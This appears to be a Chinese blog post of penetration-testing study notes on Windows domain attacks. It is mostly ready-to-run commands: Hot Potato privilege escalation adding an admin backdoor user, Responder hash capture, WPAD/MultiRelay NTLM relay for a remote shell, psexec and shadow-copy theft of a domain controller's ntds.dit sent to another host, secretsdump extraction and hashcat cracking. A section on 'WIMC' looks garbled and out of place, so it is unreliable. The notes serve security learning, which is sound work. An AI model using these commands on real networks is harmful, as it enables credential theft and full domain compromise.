内网渗透-跨域环境渗透-2

真的学不了一点。。。

于 2024-03-13 13:59:10 发布

阅读量398

点赞数 9

分类专栏：内网渗透文章标签：网络安全

本文链接：https://blog.csdn.net/rx3225968517/article/details/136678079

版权

内网渗透专栏收录该内容

7 篇文章 0 订阅

订阅专栏

内网渗透-跨域环境渗透-2

热土豆提权

这个是提升本地权限的，不是提域控！

总结：

Potato.exe -ip 需要提权的IP -disable exhaust true -cmd "C:\Windows\System32\cmd.exe /K net user potato 123.com /add &&net localgroup administrators potato /add"

调用exe执行程序，-ip后面加上需要提权的IP；-disable exhaust 后面改成 true ；-cmd 调用cmd.exe程序，然后创建一个potato用户，密码为 123.com ,并且加入到管理员组里面！

Wimc连接执行命令

1. **打开命令行终端**：打开命令提示符或 PowerShell 终端，以便执行命令。
2. **连接到 WIMC**：在命令行中输入以下命令来连接到 WIMC：
   ```
   wimc.exe /CONNECT /WimFilePath:<WIM文件路径>
   ```
   替换 `<WIM文件路径>` 为您想要连接的 WIM 文件的完整路径。

3. **执行命令**：一旦连接成功，您可以在 WIMC 终端中执行各种命令。例如，您可以运行以下命令之一：
   - `APPLY`：将映像应用到指定目标。
   - `RENAME`：重命名映像中的项目。
   - `COMMIT`：将更改保存到映像中。
   - `UNMOUNT`：卸载已挂载的映像。

Responder 密码抓取

总结：

1、首先，浏览器在正常情况下会存在自动检测代理的设置，我们只需要使用responder监听这个网口就行！

2、responder -I 网卡名称

3、得到加密的hash密文。如果是windows默认的登录密文，是以NTLM加密的格式！

4、利用hashcat破解即可！
hashcat -a 0 -m 5600 hash.txt dic.txt --force

WPAD提权

总结：

1、WPAD提权就是在responder的基础上进行的！
vi /usr/share/responder/Responder.conf 
修改配置文件  把SMB和HTTP都改成OFF

2、修改配置文件
cd /usr/share/responder/tools
python RunFinger.py -i IP
在tools中利用检测脚本，来检测哪些可以进行攻击

3、在第一个终端上，开启responder: python Responder.py -l eth0
在第二个终端上，运行Multirelay.py脚本: python MultiRelay.py -t 可攻击的主机IP -U ALL

4、只要攻击目标任意登录网站，我们即可获取到对方的cmd命令窗口

提取域控的NTDS hash文件

总结：(自己带入IP)

1、psexec/accepteula 设置psexec接受模式
net use\192.168.3.130\ipc$ "1234.com"/user:"cracer\administrator" : 与域控建立一个空链接

2、查看域控是否建立卷影副本，将文件保存到本地查看
psexec \\192.168.3.130 -u "cracer\administrator" -p "1234.com" -h cmd /c"vssadmin list shadows
>>\192.168.3.132\c$\test\out.txt"

3、如果没有，我们就手工建立一个
psexec \\192.168.3.130 -u cracer\administrator -p "1234.com" -h cmd /c "vssadmin create shadow /for=c:
>>192.168.3.132\c$\test\louts.txt"

4、将NTDS文件拷贝到本地服务器
psexec \\192.168.3.130 -u "cracer\administrator" -p "1234.com" -h cmd /c "copy\\?\GLOBALROOT \Device\Harddisk\VolumeshadowCopy1\windows\ntds\ntds.dit \\192.168.3.132\c$\test\"

5、删除卷影副本
vssadmin delete shadows /for=c:/quiet

如果执行psexec报错
Psexec \\192.168.8.100 -u cracer\administrator -p "1234.com" -h cmd /c "vssadmin create shadow /for=c: >> \\192.168.8.135\test\out.txt" /accepteula

尝试一下命令
psexec /accepteula \\192.168.8.100 -u cracer\administrator -p "1234.com" -h cmd /c "vssadmin create shadow /for=c: >>\\192.168.8.135\test\out.txt"

6、读取NTDS文件hash内容
使用impacket工具
./secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit -user-status local

7、hashcat暴力破解即可
hashcat -a 0 -m 1000 win.hash dic.txt -o winpass.list

-a 0 :表示字典爆破
-m 1000 :加密类型是NTML类型
win.hash : window hash密码
dic.txt : 字典
-o winpass.txt 表示将结果输出到 winpass.txt文件中